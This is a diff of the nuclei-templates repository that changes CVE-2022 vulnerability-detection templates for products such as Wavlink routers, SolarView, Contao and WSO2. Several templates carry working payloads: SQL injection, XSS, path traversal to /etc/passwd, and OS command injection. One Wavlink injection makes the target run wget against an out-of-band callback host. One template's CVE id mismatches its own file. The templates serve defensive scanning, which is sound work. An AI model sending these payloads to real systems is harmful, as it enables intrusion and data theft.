a/nuclei-templates/CVE-2022/CVE-2022-24260.yaml b/nuclei-templates/CVE-2022/CVE-2022-24260.yaml index e0535c78c8..b23a28e956 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-24260.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-24260.yaml @@ -5,20 +5,32 @@ info: author: gy741 severity: critical description: A SQL injection vulnerability in Voipmonitor GUI before v24.96 allows attackers to escalate privileges to the Administrator level. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the SQL injection vulnerability in the VoipMonitor application. reference: - https://kerbit.io/research/read/blog/3 - https://nvd.nist.gov/vuln/detail/CVE-2022-24260 - https://www.voipmonitor.org/changelog-gui?major=5 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-24260 cwe-id: CWE-89 + epss-score: 0.28138 + epss-percentile: 0.96726 + cpe: cpe:2.3:a:voipmonitor:voipmonitor:*:*:*:*:*:*:*:* metadata: + max-request: 1 + vendor: voipmonitor + product: voipmonitor shodan-query: http.title:"VoIPmonitor" tags: cve,cve2022,voipmonitor,sqli,unauth -requests: +http: - raw: - | POST /api.php HTTP/1.1 @@ -45,5 +57,4 @@ requests: - type: kval kval: - PHPSESSID - -# Enhanced by mp on 2022/03/08 +# digest: 4a0a0047304502205c7937f2712f6a6ba6b8e7005ee21d6e468bad7ca3c51d3878893ccef2720a70022100df3fc30f43920379b57b786480242a3d9d051c85c91ed906d1aff9421526d413:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-24681.yaml b/nuclei-templates/CVE-2022/CVE-2022-24681.yaml deleted file mode 100644 index ae88561611..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-24681.yaml +++ /dev/null @@ -1,43 +0,0 @@ -id: CVE-2022-24681 -info: - name: ManageEngine ADSelfService - Stored XSS - author: Open-Sec - severity: medium - description: | - Zoho ManageEngine ADSelfService Plus before 6121 allows XSS via the welcome name attribute to the Reset Password, Unlock Account, or User Must Change Password screen. - reference: - - https://raxis.com/blog/cve-2022-24681 - - https://nvd.nist.gov/vuln/detail/CVE-2022-24681 - - https://www.manageengine.com/products/self-service-password/advisory/CVE-2022-24681.html - - https://manageengine.com - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-24681 - cwe-id: CWE-79 - tags: cve,cve2022,manageengine,xss,authenticated -requests: - - raw: - - | - POST /servlet/GetProductVersion HTTP/1.1 - Host: {{Hostname}} - extractors: - - type: regex - part: body - name: buildnumber - group: 1 - regex: - - '"BUILD_NUMBER":"([0-9]+)",' - internal: true - matchers-condition: and - matchers: - - type: dsl - dsl: - - compare_versions(buildnumber, '< 6121') - - type: word - part: body - words: - - "ManageEngine" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-2486.yaml b/nuclei-templates/CVE-2022/CVE-2022-2486.yaml new file mode 100644 index 0000000000..2c3533d673 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-2486.yaml @@ -0,0 +1,34 @@ +id: CVE-2022-2486 +info: + name: Wavlink Mesh.cgi - Remote Code Execution + author: For3stCo1d + severity: critical + description: | + A vulnerability, which was classified as critical, was found in WAVLINK WN535K2 and WN535K3. This affects an unknown part of the file /cgi-bin/mesh.cgi?page=upgrade. The manipulation of the argument key leads to os command injection. The exploit has been disclosed to the public and may be used. + reference: + - https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20mesh.cgi.md + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2486 + - https://vuldb.com/?id.204537 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-2486 + cwe-id: CWE-78 + metadata: + shodan-query: http.title:"Wi-Fi APP Login" + verified: "true" + tags: cve,cve2022,iot,wavlink,router,rce,oast +requests: + - raw: + - | + GET /cgi-bin/touchlist_sync.cgi?IP=;wget+http://{{interactsh-url}}; HTTP/1.1 + Host: {{Hostname}} + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" + - type: status + status: + - 500 diff --git a/nuclei-templates/CVE-2022/CVE-2022-2487.yaml b/nuclei-templates/CVE-2022/CVE-2022-2487.yaml deleted file mode 100644 index 899076eb8b..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-2487.yaml +++ /dev/null @@ -1,42 +0,0 @@ -id: CVE-2022-2487 -info: - name: Wavlink Nightled.cgi - Remote Code Execution - author: For3stCo1d - severity: critical - description: | - A vulnerability has been found in WAVLINK WN535K2 and WN535K3 and classified as critical. This vulnerability affects unknown code of the file /cgi-bin/nightled.cgi. The manipulation of the argument start_hour leads to os command injection. The exploit has been disclosed to the public and may be used. - reference: - - https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20nightled.cgi%20.md - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2487 - - https://vuldb.com/?id.204538 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-2487 - cwe-id: CWE-78 - metadata: - shodan-query: http.title:"Wi-Fi APP Login" - verified: "true" - tags: cve,cve2022,iot,wavlink,router,rce,oast -variables: - cmd: "id" -requests: - - raw: - - | - @timeout: 10s - POST /cgi-bin/nightled.cgi HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - page=night_led&start_hour=;{{cmd}}; - matchers-condition: and - matchers: - - type: word - part: body - words: - - "uid=" - - "gid=" - condition: and - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-24899.yaml b/nuclei-templates/CVE-2022/CVE-2022-24899.yaml deleted file mode 100644 index f5827141b0..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-24899.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2022-24899 -info: - name: Contao 4.13.2 - Cross-Site Scripting (XSS) - author: ritikchaddha - severity: medium - description: | - Contao is a powerful open source CMS that allows you to create professional websites and scalable web applications. In versions of Contao prior to 4.13.3 it is possible to inject code into the canonical tag. As a workaround users may disable canonical tags in the root page settings. - reference: - - https://huntr.dev/bounties/df46e285-1b7f-403c-8f6c-8819e42deb80/ - - https://github.com/contao/contao/security/advisories/GHSA-m8x6-6r63-qvj2 - - https://nvd.nist.gov/vuln/detail/CVE-2022-24899 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-24899 - cwe-id: CWE-79 - metadata: - shodan-query: title:"Contao" - tags: cve,cve2022,contao,xss -requests: - - method: GET - path: - - "{{BaseURL}}/contao/%22%3e%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - matchers-condition: and - matchers: - - type: word - part: body - words: - - '"></script><script>alert(document.domain)</script>' - - '"Not authenticated"' - condition: and - - type: word - part: header - words: - - text/html diff --git a/nuclei-templates/CVE-2022/CVE-2022-24900.yaml b/nuclei-templates/CVE-2022/CVE-2022-24900.yaml deleted file mode 100644 index 9f2945210d..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-24900.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2022-24900 -info: - name: Piano LED Visualizer 1.3 - Local File Inclusion - author: 0x_Akoko - severity: high - description: | - Piano LED Visualizer 1.3 and prior are vulnerable to local file inclusion. - reference: - - https://github.com/onlaj/Piano-LED-Visualizer/issues/350 - - https://vuldb.com/?id.198714 - - https://www.cvedetails.com/cve/CVE-2022-24900/ - - https://github.com/onlaj/Piano-LED-Visualizer/commit/3f10602323cd8184e1c69a76b815655597bf0ee5 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 - cve-id: CVE-2022-24900 - cwe-id: CWE-610 - tags: cve,cve2022,lfi,piano,iot,oss -requests: - - method: GET - path: - - "{{BaseURL}}/api/change_setting?second_value=no_reload&disable_sequence=true&value=../../../../../../../etc/passwd" - matchers-condition: and - matchers: - - type: regex - part: body - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/06/29 diff --git a/nuclei-templates/CVE-2022/CVE-2022-25216.yaml b/nuclei-templates/CVE-2022/CVE-2022-25216.yaml deleted file mode 100644 index 736ee3bfa6..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-25216.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2022-25216 - -info: - name: DVDFab 12 Player/PlayerFab - Arbitrary File Read - author: 0x_Akoko - severity: high - description: An absolute path traversal vulnerability allows a remote attacker to download any file on the Windows file system for which the user account running DVDFab 12 Player (recently renamed PlayerFab) has read-access - reference: - - https://www.tenable.com/security/research/tra-2022-07 - - https://www.cvedetails.com/cve/CVE-2022-25216 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2022-25216 - cwe-id: CWE-22 - tags: cve,cve2022,dvdFab,lfi,lfr - -requests: - - method: GET - path: - - "{{BaseURL}}/download/C%3a%2fwindows%2fsystem.ini" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "bit app support" - - "fonts" - - "extensions" - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-25323.yaml b/nuclei-templates/CVE-2022/CVE-2022-25323.yaml deleted file mode 100644 index c5d5548842..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-25323.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: CVE-2022-25323 - -info: - name: ZEROF Web Server 2.0 Cross-Site Scripting - author: pikpikcu - severity: medium - description: ZEROF Web Server 2.0 allows /admin.back cross-site scripting. - reference: - - https://github.com/awillix/research/blob/main/cve/CVE-2022-25323.md - - https://nvd.nist.gov/vuln/detail/CVE-2022-25323 - - https://awillix.ru - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-25323 - cwe-id: CWE-79 - tags: xss,cve,cve2022,zerof - -requests: - - method: GET - path: - - "{{BaseURL}}/admin.back<img%20src=x%20onerror=alert(document.domain)>" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'back<img src=x onerror=alert(document.domain)>' - - - type: word - part: header - words: - - "text/html" - - - type: status - status: - - 401 - -# Enhanced by mp on 2022/03/07 diff --git a/nuclei-templates/CVE-2022/cve-2022-25369.yaml b/nuclei-templates/CVE-2022/CVE-2022-25369.yaml similarity index 100% rename from nuclei-templates/CVE-2022/cve-2022-25369.yaml rename to nuclei-templates/CVE-2022/CVE-2022-25369.yaml diff --git a/nuclei-templates/CVE-2022/CVE-2022-26135.yaml b/nuclei-templates/CVE-2022/CVE-2022-26135.yaml new file mode 100644 index 0000000000..f24f3f1cf7 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-26135.yaml @@ -0,0 +1,28 @@ +id: CVE-2022-26135 +info: + name: Full-Read Server Side Request Forgery in Mobile Plugin for Jira Data Center and Server + author: dk4trin + severity: high + description: A vulnerability in Mobile Plugin for Jira Data Center and Server allows a remote, authenticated user (including a user who joined via the sign-up feature) to perform a full read server-side request forgery via a batch endpoint. This affects Atlassian Jira Server and Data Center from version 8.0.0 before version 8.13.22, from version 8.14.0 before 8.20.10, from version 8.21.0 before 8.22.4. This also affects Jira Management Server and Data Center versions from version 4.0.0 before 4.13.22, from version 4.14.0 before 4.20.10 and from version 4.21.0 before 4.22.4. + reference: + - https://confluence.atlassian.com/jira/jira-server-security-advisory-29nd-june-2022-1142430667.html + - https://github.com/assetnote/jira-mobile-ssrf-exploit + classification: + cvss-score: 7.5 + cve-id: CVE-2020-14179 + tags: cve,cve2022,atlassian,jira,ssrf +requests: + - method: GET + path: + - "{{BaseURL}}/secure/Signup!default.jspa" + matchers-condition: and + matchers: + - type: word + words: + - "Email" + - "Username" + - "Password" + condition: and + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-26148.yaml b/nuclei-templates/CVE-2022/CVE-2022-26148.yaml index 315b0b25a8..da8a297eb5 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-26148.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-26148.yaml @@ -1,38 +1,44 @@ id: CVE-2022-26148 info: - name: Grafana & Zabbix Integration - Credential Disclosure + name: Grafana & Zabbix Integration - Credentials Disclosure author: Geekby severity: critical description: | Grafana through 7.3.4, when integrated with Zabbix, contains a credential disclosure vulnerability. The Zabbix password can be found in the api_jsonrpc.php HTML source code. When the user logs in and allows the user to register, one can right click to view the source code and use Ctrl-F to search for password in api_jsonrpc.php to discover the Zabbix account password and URL address. + impact: | + An attacker can obtain sensitive credentials, leading to unauthorized access and potential data breaches. + remediation: | + Update to the latest version of the Grafana & Zabbix Integration plugin to fix the vulnerability. reference: - https://2k8.org/post-319.html - https://security.netapp.com/advisory/ntap-20220425-0005/ - https://nvd.nist.gov/vuln/detail/CVE-2022-26148 + - https://github.com/HimmelAward/Goby_POC + - https://github.com/Z0fhack/Goby_POC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-26148 + cwe-id: CWE-312 + epss-score: 0.15727 + epss-percentile: 0.95795 + cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* metadata: - fofa-query: app="Grafana" + max-request: 1 + vendor: grafana + product: grafana shodan-query: title:"Grafana" + fofa-query: app="Grafana" tags: cve,cve2022,grafana,zabbix,exposure -requests: +http: - method: GET path: - "{{BaseURL}}/login?redirect=%2F" matchers-condition: and matchers: - - type: regex - part: body - regex: - - '"password":"(.*?)"' - - '"username":"(.*?)"' - condition: and - - type: word part: body words: @@ -41,6 +47,13 @@ requests: - "alexanderzobnin-zabbix-datasource" condition: or + - type: regex + part: body + regex: + - '"password":"(.*?)"' + - '"username":"(.*?)"' + condition: and + - type: status status: - 200 @@ -52,5 +65,4 @@ requests: - '"password":"(.*?)"' - '"username":"(.*?)"' - '"url":"([a-z:/0-9.]+)\/api_jsonrpc\.php' - -# Enhanced by mp on 2022/05/19 +# digest: 4a0a00473045022100b6eaad94ff3878067cbf35ebf2e98041d29ea00cd548a6acc1cebf8170545ff5022011109ec67dc75367e14a57c39726ee1cd3150458963d5a36b4ea0a51e0b68769:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-26159.yaml b/nuclei-templates/CVE-2022/CVE-2022-26159.yaml new file mode 100644 index 0000000000..41d6be2d94 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-26159.yaml @@ -0,0 +1,40 @@ +id: CVE-2022-26159 + +info: + name: Ametys CMS Information Disclosure + author: Remi Gascou (podalirius) + severity: medium + description: Ametys CMS before 4.5.0 allows a remote unauthenticated attacker to read documents such as plugins/web/service/search/auto-completion/domain/en.xml (and similar pathnames for other languages) via the auto-completion plugin, which contain all characters typed by all users, including the content of private pages. For example, a private page may contain usernames, e-mail addresses, and possibly passwords. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-26159 + - https://podalirius.net/en/cves/2022-26159/ + - https://issues.ametys.org/browse/CMS-10973 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2022-26159 + tags: cve,cve2022,plugin,ametys,cms + +requests: + - method: GET + path: + - '{{BaseURL}}/plugins/web/service/search/auto-completion/domain/en.xml?q=adm' + + matchers-condition: and + matchers: + - type: word + words: + - '<auto-completion>' + - '<item>' + condition: and + + - type: word + part: header + words: + - 'text/xml' + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/23 diff --git a/nuclei-templates/CVE-2022/cve-2022-27849.yaml b/nuclei-templates/CVE-2022/CVE-2022-27849.yaml similarity index 100% rename from nuclei-templates/CVE-2022/cve-2022-27849.yaml rename to nuclei-templates/CVE-2022/CVE-2022-27849.yaml diff --git a/nuclei-templates/CVE-2022/CVE-2022-27927.yaml b/nuclei-templates/CVE-2022/CVE-2022-27927.yaml deleted file mode 100644 index 96820d1ca3..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-27927.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2022-27927 -info: - name: Microfinance Management System 1.0 - SQL Injection - author: lucasljm2001,ekrause - severity: critical - description: | - Microfinance Management System 1.0 is susceptible to SQL Injection. - reference: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27927 - - https://www.sourcecodester.com/sites/default/files/download/oretnom23/mims_0.zip - - https://www.exploit-db.com/exploits/50891 - - https://nvd.nist.gov/vuln/detail/CVE-2022-27927 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-27927 - cwe-id: CWE-89 - metadata: - verified: "true" - tags: cve,cve2022,sqli,microfinance -variables: - num: "999999999" -requests: - - raw: - - | - GET /mims/updatecustomer.php?customer_number=-1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(md5({{num}}),1,2),NULL,NULL,NULL,NULL,NULL,NULL' HTTP/1.1 - Host: {{Hostname}} - matchers-condition: and - matchers: - - type: word - part: body - words: - - '{{md5({{num}})}}' - - type: status - status: - - 200 - -# Enhanced by mp on 2022/07/04 diff --git a/nuclei-templates/CVE-2022/CVE-2022-28080.yaml b/nuclei-templates/CVE-2022/CVE-2022-28080.yaml new file mode 100644 index 0000000000..dc59377c75 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-28080.yaml @@ -0,0 +1,65 @@ +id: CVE-2022-28080 +info: + name: Royal Event - SQL Injection + author: lucasljm2001,ekrause,ritikchaddha + severity: high + description: | + Detects an SQL Injection vulnerability in Royal Event System + reference: + - https://www.exploit-db.com/exploits/50934 + - https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip + - https://nvd.nist.gov/vuln/detail/CVE-2022-28080 + - https://github.com/erengozaydin/Royal-Event-Management-System-todate-SQL-Injection-Authenticated + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2022-28080 + tags: cve,cve2022,sqli,authenticated,cms,royalevent +requests: + - raw: + - | + POST /royal_event/ HTTP/1.1 + Host: {{Hostname}} + Content-Length: 353 + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCSxQll1eihcqgIgD + + ------WebKitFormBoundaryCSxQll1eihcqgIgD + Content-Disposition: form-data; name="username" + + {{username}} + ------WebKitFormBoundaryCSxQll1eihcqgIgD + Content-Disposition: form-data; name="password" + + {{password}} + ------WebKitFormBoundaryCSxQll1eihcqgIgD + Content-Disposition: form-data; name="login" + + + ------WebKitFormBoundaryCSxQll1eihcqgIgD-- + - | + POST /royal_event/btndates_report.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFboH5ITu7DsGIGrD + + ------WebKitFormBoundaryFboH5ITu7DsGIGrD + Content-Disposition: form-data; name="todate" + + 1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5("{{randstr}}"),0x1,0x2),NULL-- - + ------WebKitFormBoundaryFboH5ITu7DsGIGrD + Content-Disposition: form-data; name="search" + + 3 + ------WebKitFormBoundaryFboH5ITu7DsGIGrD + Content-Disposition: form-data; name="fromdate" + + 01/01/2011 + ------WebKitFormBoundaryFboH5ITu7DsGIGrD-- + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + words: + - '{{md5("{{randstr}}")}}' + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-28365.yaml b/nuclei-templates/CVE-2022/CVE-2022-28365.yaml new file mode 100644 index 0000000000..2260c8d8ae --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-28365.yaml @@ -0,0 +1,37 @@ +id: CVE-2022-28365 + +info: + name: Reprise License Manager 14.2 - Information Disclosure + author: Akincibor + severity: medium + description: | + Reprise License Manager 14.2 is affected by an Information Disclosure vulnerability via a GET request to /goforms/rlminfo. No authentication is required. The information disclosed is associated with software versions, process IDs, network configuration, hostname(s), system architecture and file/directory information. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-28365 + - https://www.reprisesoftware.com/products/software-license-management.php + - https://github.com/advisories/GHSA-4g2v-6x25-vr7p + - http://packetstormsecurity.com/files/166647/Reprise-License-Manager-14.2-Cross-Site-Scripting-Information-Disclosure.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2022-28365 + cwe-id: CWE-668 + tags: cve,cve2022,exposure,rlm + +requests: + - method: GET + path: + - "{{BaseURL}}/goforms/rlminfo" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - "RLM Version" + - "Platform type" + condition: and diff --git a/nuclei-templates/CVE-2022/CVE-2022-29299.yaml b/nuclei-templates/CVE-2022/CVE-2022-29299.yaml deleted file mode 100644 index 7bec163c15..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-29299.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2022-29299 -info: - name: SolarView Compact 6.00 - 'time_begin' Cross-Site Scripting - author: For3stCo1d - severity: medium - description: | - SolarView Compact version 6.00 contains a cross-site scripting vulnerability in the 'time_begin' parameter to Solar_History.php. - reference: - - https://www.exploit-db.com/exploits/50967 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29299 - classification: - cve-id: CVE-2022-29299 - metadata: - verified: true - shodan-query: http.favicon.hash:-244067125 - tags: cve,cve2022,xss,solarview -requests: - - method: GET - path: - - '{{BaseURL}}/Solar_History.php?time_begin=xx%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&time_end=&event_level=0&event_pcs=1&search_on=on&search_off=on&word=hj%27&sort_type=0&record=10&command=%95%5C%8E%A6' - matchers-condition: and - matchers: - - type: word - part: body - words: - - '<script>alert(document.domain)</script><"">' - - '/Solar_History.php" METHOD="post">' - condition: and - - type: word - part: header - words: - - "text/html" - - type: status - status: - - 200 - -# Enhanced by cs 06/21/2022 diff --git a/nuclei-templates/CVE-2022/CVE-2022-29301.yaml b/nuclei-templates/CVE-2022/CVE-2022-29301.yaml new file mode 100644 index 0000000000..336c1d1ad1 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-29301.yaml @@ -0,0 +1,37 @@ +id: CVE-2022-29301 +info: + name: SolarView Compact 6.00 - 'pow' Cross-Site Scripting (XSS) + author: For3stCo1d + severity: high + description: | + SolarView Compact version 6.00 contains a cross-site scripting vulnerability in the 'pow' parameter to Solar_SlideSub.php. + reference: + - https://www.exploit-db.com/exploits/50968 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29301 + classification: + cve-id: CVE-2022-29301 + metadata: + verified: true + shodan-query: http.favicon.hash:-244067125 + tags: cve,cve2022,xss,solarview +requests: + - method: GET + path: + - '{{BaseURL}}/Solar_SlideSub.php?id=4&play=1&pow=sds%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&bgcolor=green' + matchers-condition: and + matchers: + - type: word + part: body + words: + - '<script>alert(document.domain)</script><"">' + - 'SolarView' + condition: and + - type: word + part: header + words: + - "text/html" + - type: status + status: + - 200 + +# Enhanced by cs 06/21/2022 diff --git a/nuclei-templates/CVE-2022/CVE-2022-29303.yaml b/nuclei-templates/CVE-2022/CVE-2022-29303.yaml index 147affdca5..3f9b0f07ff 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-29303.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-29303.yaml @@ -1,39 +1,58 @@ id: CVE-2022-29303 info: - name: SolarView Compact 6.0 - OS Command Injection + name: SolarView Compact 6.00 - OS Command Injection author: badboycxcc severity: critical description: | - SolarView Compact ver.6.00 was discovered to contain a command injection vulnerability via conf_mail.php. + SolarView Compact 6.00 was discovered to contain a command injection vulnerability via conf_mail.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized remote code execution, potentially compromising the confidentiality, integrity, and availability of the system. + remediation: | + Apply the latest patch or update provided by the vendor to fix the OS command injection vulnerability in SolarView Compact 6.00. reference: - https://www.exploit-db.com/exploits/50940 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29303 - https://drive.google.com/drive/folders/1tGr-WExbpfvhRg31XCoaZOFLWyt3r60g?usp=sharing + - http://packetstormsecurity.com/files/167183/SolarView-Compact-6.0-Command-Injection.html + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-29303 - cwe-id: CWE-77 + cwe-id: CWE-78 + epss-score: 0.9598 + epss-percentile: 0.99429 + cpe: cpe:2.3:o:contec:sv-cpt-mc310_firmware:6.00:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: contec + product: sv-cpt-mc310_firmware shodan-query: http.html:"SolarView Compact" - verified: "true" - tags: cve,cve2022,rce,injection - + tags: cve,cve2022,injection,solarview,edb,packetstorm,rce,kev,contec variables: cmd: "cat${IFS}/etc/passwd" -requests: +http: - raw: - | + @timeout: 25s POST /conf_mail.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded mail_address=%3B{{cmd}}%3B&button=%83%81%81%5B%83%8B%91%97%90M + matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0" + + - type: word + part: body + words: + - "p1_network_mail.cgi" +# digest: 4a0a00473045022100cfdae160b8d20debb49ab77a03efc5984e3595e0738b0153de27449eb8cf254c022008bf10a1ac0f9b524841d022daae36b4b0b105ddae1296e300fb87c886200617:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-29548.yaml b/nuclei-templates/CVE-2022/CVE-2022-29548.yaml new file mode 100644 index 0000000000..f6b5e980e8 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-29548.yaml @@ -0,0 +1,37 @@ +id: CVE-2022-29548 +info: + name: WSO2 Management Console - Reflected XSS + author: edoardottt + severity: medium + description: | + A reflected XSS issue exists in the Management Console of several WSO2 products. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-29548 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29548 + - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2021-1603 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-29548 + cwe-id: CWE-79 + metadata: + google-dork: inurl:"carbon/admin/login" + verified: "true" + tags: cve,cve2022,wso2,xss +requests: + - method: GET + path: + - "{{BaseURL}}/carbon/admin/login.jsp?loginStatus=false&errorCode=%27);alert(document.domain)//" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "CARBON.showWarningDialog('???');alert(document.domain)//???" + - type: word + part: header + words: + - "text/html" + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-30776.yaml b/nuclei-templates/CVE-2022/CVE-2022-30776.yaml deleted file mode 100644 index 13cca2459e..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-30776.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2022-30776 -info: - name: Atmail - Cross Site Scripting - author: 3th1c_yuk1 - severity: medium - description: | - atmail 6.5.0 allows XSS via the index.php/admin/index/ error parameter. - reference: - - https://medium.com/@bhattronit96/cve-2022-30776-cd34f977c2b9 - - https://www.atmail.com/ - - https://nvd.nist.gov/vuln/detail/CVE-2022-30776 - - https://help.atmail.com/hc/en-us/sections/115003283988 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-30776 - cwe-id: CWE-79 - metadata: - shodan-query: http.html:"atmail" - verified: "true" - tags: cve,cve2022,atmail,xss -requests: - - method: GET - path: - - "{{BaseURL}}/atmail/index.php/admin/index/?error=1%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - matchers-condition: and - matchers: - - type: word - part: body - words: - - "Error: 1<script>alert(document.domain)</script>" - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-30777.yaml b/nuclei-templates/CVE-2022/CVE-2022-30777.yaml new file mode 100644 index 0000000000..2c50f208fc --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-30777.yaml @@ -0,0 +1,38 @@ +id: CVE-2022-30777 +info: + name: Parallels H-Sphere - Cross Site Scripting + author: 3th1c_yuk1 + severity: medium + description: | + Parallels H-Sphere 3.6.1713 allows XSS via the index_en.php 